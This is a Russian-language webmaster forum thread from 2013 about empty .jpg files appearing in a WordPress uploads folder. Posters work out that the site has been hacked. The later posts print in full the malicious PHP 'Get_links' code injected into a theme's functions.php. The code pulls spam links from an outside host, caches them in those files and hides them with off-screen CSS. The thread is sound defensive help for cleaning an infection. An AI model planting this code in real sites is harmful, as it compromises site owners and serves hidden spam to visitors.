X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> WordPress File Monitor: кое-что не могу понять
DarkZo5m
DarkZo5m
Topic Starter сообщение 4.7.2013, 1:26; Ответить: DarkZo5m
Сообщение #1


Завсегдатай
*****

Группа: Active User
Сообщений: 619
Регистрация: 18.10.2009
Из: :бу: :шкА
Поблагодарили: 181 раз
Репутация:   34  


Всем привет! У меня на WP сайте стоит плагин WordPress File Monitor. Он присылает ежедневно отчёт о том, какие файлы удалились, добавились или изменились. Так, в каждом отчёте есть строки о том, что были изменены файлы:

wp-content/uploads/2013/dfc946e0b0ce2cdda5d2b09935efe4e3.jpg
wp-content/uploads/2013/9cb98b1d4a45bcd7377dca2b8cdb9745.jpg

Если пройти по ссылке вида сайт.ру/wp-content/uploads/2013/dfc946e0b0ce2cdda5d2b09935efe4e3.jpg, то выдаётся сообщение, что изображение не может быть показано, так как содержит ошибки.

В директории uploads лежит на данный момент 12 файлов с подобными именами, размер каждого - 0 байт, они пустые.

Файлы создались самостоятельно и в разные дни.

Может быть, кто-нибудь знает, что это за гадя и как её вылечить?


--------------------
Продаю готовый рерайт, а также делаю рерайт на заказ.
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
RSmile
RSmile
сообщение 4.7.2013, 1:40; Ответить: RSmile
Сообщение #2


Бывалый
****

Группа: User
Сообщений: 496
Регистрация: 2.11.2012
Из: Brest
Поблагодарили: 204 раза
Репутация:   32  


Шелл залит) Нотепадом этот файл откройте и посмотрите его) А может с темой залит, смотреть надо. Удаляйте и ищите вредоносный код. Обычно в функшн.рхр

Сообщение отредактировал RSmile - 4.7.2013, 1:41


--------------------
Безлимитный SSD-Хостинг. Рекомендую! Месяц бесплатно!


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
DarkZo5m
DarkZo5m
Topic Starter сообщение 4.7.2013, 1:55; Ответить: DarkZo5m
Сообщение #3


Завсегдатай
*****

Группа: Active User
Сообщений: 619
Регистрация: 18.10.2009
Из: :бу: :шкА
Поблагодарили: 181 раз
Репутация:   34  


(RSmile @ 4.7.2013, 2:40) *
Нотепадом этот файл откройте и посмотрите его)

Так открыл уже все файлы, написал же, они пустые.

И с темой тоже не лились.


--------------------
Продаю готовый рерайт, а также делаю рерайт на заказ.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
RSmile
RSmile
сообщение 4.7.2013, 2:14; Ответить: RSmile
Сообщение #4


Бывалый
****

Группа: User
Сообщений: 496
Регистрация: 2.11.2012
Из: Brest
Поблагодарили: 204 раза
Репутация:   32  


Причём тут пустые? Потом через шелл они наполнятся
Вот пример кода который встречается в файлах

<!-- wp-templates.ru/rules правила ссылки >> --> <div id="posts"> Простые, интересные и умные <a href="http://timedead.ru/">флешки</a> </div><noindex><style>#posts{position:absolute;left:-1960px;}</style></noindex>


Сообщение отредактировал RSmile - 4.7.2013, 2:21


--------------------
Безлимитный SSD-Хостинг. Рекомендую! Месяц бесплатно!
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
DarkZo5m
DarkZo5m
Topic Starter сообщение 4.7.2013, 2:25; Ответить: DarkZo5m
Сообщение #5


Завсегдатай
*****

Группа: Active User
Сообщений: 619
Регистрация: 18.10.2009
Из: :бу: :шкА
Поблагодарили: 181 раз
Репутация:   34  


(RSmile @ 4.7.2013, 3:14) *
Скачайте Notepad++ и им откройте этот "пустой" файл.

Скачал Notepad++, открыл им этот пустой файл и, не поверите, он оказался пустым. В чём тогда может быть дело?


--------------------
Продаю готовый рерайт, а также делаю рерайт на заказ.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
RSmile
RSmile
сообщение 4.7.2013, 14:01; Ответить: RSmile
Сообщение #6


Бывалый
****

Группа: User
Сообщений: 496
Регистрация: 2.11.2012
Из: Brest
Поблагодарили: 204 раза
Репутация:   32  


Ну ок, тогда ждите пометки от Яндекса. Я же русским языком написал, что это пока они пустые, потом заполнятся кодом. Ищите вредоносный код. Он может быть где угодно. Для начала начните с файлов темы. Это не так трудно.


--------------------
Безлимитный SSD-Хостинг. Рекомендую! Месяц бесплатно!
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
HeavyHell
HeavyHell
сообщение 4.7.2013, 14:42; Ответить: HeavyHell
Сообщение #7


Бывалый
****

Группа: User
Сообщений: 392
Регистрация: 26.12.2008
Поблагодарили: 95 раз
Репутация:   26  


DarkZo5m, рассказать почему RSmile столь уверенно вам пытается объяснить?
Менее недели назад мы один его сайт от этой бяки чистили... Даже не знаю, есть ли смысл создавать тему коль не слушаете советов тех, кто с этим сталкивался biggrin.gif


--------------------


Поблагодарили: (2)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
SeoFirma
SeoFirma
сообщение 4.7.2013, 22:25; Ответить: SeoFirma
Сообщение #8


Новичок
*

Группа: User
Сообщений: 40
Регистрация: 9.6.2012
Поблагодарили: 12 раз
Репутация:   5  


DarkZo5m, у Вас какая-то гадость в файлах темы, плагинов или движка. Это дырка, через которую пытаются что-то залить.

RSmile Вам написал пример кода, в данном случае, это скорее всего тоже взлом был. Ему таким образом вставляли невидимые для посетителей сайта ссылки.

Первым делом, советую пересмотреть файлы темы, если разбираетесь в коде. А вообще, лучше переустановить движок с нуля, может еще где зараза есть. Ну и код темы смотреть обязательно.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kagtus
kagtus
сообщение 6.7.2013, 1:22; Ответить: kagtus
Сообщение #9


Бывалый
****

Группа: User
Сообщений: 416
Регистрация: 11.10.2012
Из: Kostroma
Поблагодарили: 94 раза
Репутация:   21  


ищите в файлах шаблона вставку с таким началом
<?php
error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

var $host = 'wpconfig.net';
var $path = '/system.php';
var $_cache_lifetime = 21600;
var $_socket_timeout = 5;


сегодня удалял такое, вставка была в wp-content/themes/тема/functions.php
спамила в wp-content/uploads/2013

Сообщение отредактировал kagtus - 6.7.2013, 1:25


--------------------
ася 45два48499два
удалю вирусы, помогу с сайтом ->отзывы ТУТ и ТАМ


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
DarkZo5m
DarkZo5m
Topic Starter сообщение 7.7.2013, 14:51; Ответить: DarkZo5m
Сообщение #10


Завсегдатай
*****

Группа: Active User
Сообщений: 619
Регистрация: 18.10.2009
Из: :бу: :шкА
Поблагодарили: 181 раз
Репутация:   34  


Хм, и правда, была гадя на сайте. В общем, у кого такая же проблема, открываем functions.php темы и удаляем оттуда следующий код:

<?php error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

    var $host = 'wpconfig.net';
    var $path = '/system.php';
    var $_cache_lifetime    = 21600;
    var $_socket_timeout    = 5;

    function get_remote() {
    $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
    $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

         $links_class = new Get_links();
         $host = $links_class->host;
         $path = $links_class->path;
         $_socket_timeout = $links_class->_socket_timeout;
         //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                    "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context);
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
           return '<!--link error-->';
      }

    function return_links($lib_path) {
         $links_class = new Get_links();
         $file = ABSPATH.'wp-content/uploads/2013/'.md5($_SERVER['REQUEST_URI']).'.jpg';
         $_cache_lifetime = $links_class->_cache_lifetime;

        if (!file_exists($file))
        {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } elseif ( time()-filemtime($file) > $_cache_lifetime || filesize($file) == 0) {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } else {
            $data = file_get_contents($file);
            return $data;
        }
    }
}
?>


--------------------
Продаю готовый рерайт, а также делаю рерайт на заказ.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Пошив одежды - что не так с сайтом ?
18 bridge8 1239 Сегодня, 14:01
автор: bridge8
Открытая тема (нет новых ответов) [Бесплатный тест] Airsocks. Инновационные мобильные 4G / LTE прокси. Забудь все что было раньше!
26 airsocks11 6090 Вчера, 22:41
автор: airsocks11
Горячая тема (нет новых ответов) Что лучше, фриланс, удаленка, или работа в офисе солидной компании?
95 Levizar 7711 Вчера, 21:57
автор: Зотов
Горячая тема (нет новых ответов) Вёрстка, натяжка на WordPress, Joomla, качественно, доступно
53 WhiteIce 23739 Вчера, 19:41
автор: WhiteIce
Горячая тема (нет новых ответов) Разработка сайтов Joomla Wordpress Opencart
Разработка, верстка, оптимизация веб сайтов.
48 WoWeb 7316 Вчера, 13:37
автор: serg5777


 



RSS Текстовая версия Сейчас: 13.12.2017, 15:40
Дизайн